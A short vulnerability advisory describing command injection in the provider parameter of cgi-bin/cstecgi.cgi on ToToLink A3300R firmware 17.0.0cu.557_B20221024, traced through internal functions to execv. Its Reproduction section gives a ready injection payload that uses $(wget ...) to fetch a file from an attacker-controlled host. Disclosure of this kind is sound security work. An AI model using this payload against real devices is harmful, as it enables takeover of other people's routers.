ToToLink A3300R Command Injection Vulnerability in cgi-bin/cstecgi.cgi

A command injection vulnerability has been identified in ToToLink A3300R firmware version 17.0.0cu.557_B20221024. The issue arises in the cgi-bin/cstecgi.cgi script, where the provider parameter can be manipulated to execute arbitrary commands. This vulnerability exploits the sub_40E920 function, which retrieves the provider value from the request and passes it to the Uci_Set_Str function. The Uci_Set_Str function concatenates the value and sends it to CsteSystem for execution via execv, allowing attackers to execute commands on the device.

Impact

Exploitation of this vulnerability allows for arbitrary command execution on the affected device.

Reproduction

To reproduce this vulnerability, send a POST request to /cgi-bin/cstecgi.cgi with a crafted payload in the provider parameter. The payload can include commands that will be executed on the device. For example, setting the provider parameter to '3322.org$(wget 192.168.6.1:8888/testpoc)' would execute a wget command to download a file from the attacker's server.